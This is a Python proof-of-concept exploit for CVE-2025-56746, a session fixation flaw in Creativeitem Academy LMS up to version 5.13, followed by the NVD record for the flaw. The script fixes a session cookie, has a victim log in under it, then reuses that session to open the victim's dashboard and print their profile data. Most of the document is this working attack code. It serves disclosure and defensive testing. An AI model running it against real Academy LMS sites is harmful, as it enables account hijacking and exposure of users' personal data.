CVE-2025-56746

# CVE-2025-56746 - Academy LMS Session Fixation PoC # Description: Demonstrates session fixation by pre-setting session ID before victim authentication import requests TARGET_URL = "http://target-academy-lms.com" VICTIM_USERNAME = "victim_user" VICTIM_PASSWORD = "victim_password" # Step 1: Attacker visits the login page and obtains a session ID attacker_session = requests.Session() login_page = attacker_session.get(f"{TARGET_URL}/login") attacker_session_id = attacker_session.cookies.get("PHPSESSID") # or session cookie name used by Academy LMS print(f"[+] Attacker obtained session ID: {attacker_session_id}") # Step 2: Attacker tricks victim into using the pre-determined session ID # This can be done via XSS, shared computer, network injection, etc. # For demonstration: directly set the session cookie in victim's browser context # Step 3: Victim authenticates using the fixed session ID victim_session = requests.Session() victim_session.cookies.set("PHPSESSID", attacker_session_id) login_data = { "email": VICTIM_USERNAME, "password": VICTIM_PASSWORD } login_response = victim_session.post(f"{TARGET_URL}/login", data=login_data) print(f"[+] Victim login response status: {login_response.status_code}") # Step 4: Attacker uses the same session ID to access victim's authenticated session # Since the application does NOT regenerate the session ID after login, # the attacker's session ID remains valid and authenticated attacker_authenticated = attacker_session.get(f"{TARGET_URL}/dashboard") if "Welcome" in attacker_authenticated.text or "Dashboard" in attacker_authenticated.text: print("[!] Session Fixation successful! Attacker is now authenticated as victim.") else: print("[-] Session fixation attempt failed.") # Step 5: Attacker accesses victim's sensitive data profile = attacker_session.get(f"{TARGET_URL}/user/profile") print(f"[+] Victim's profile data accessed: {profile.text[:200]}")

{"cve": {"id": "CVE-2025-56746", "sourceIdentifier": "[email protected]", "published": "2025-10-15T14:15:52.193", "lastModified": "2025-10-23T19:42:22.360", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Creativeitem Academy LMS up to and including 5.13 does not regenerate session IDs upon successful authentication, enabling session fixation attacks where attackers can hijack user sessions by predetermining session identifiers."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:L/I:N/A:N", "baseScore": 2.2, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 0.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-384"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:creativeitem:academy_lms:*:*:*:*:*:*:*:*", "versionEndIncluding": "5.13", "matchCriteriaId": "EEDDA428-3C2A-4CB6-B809-9859B79F2486"}]}]}], "references": [{"url": "https://suryadina.com/academy-lms-session-fixation-1t8v5n3q6h/", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Third Party Advisory"]}]}}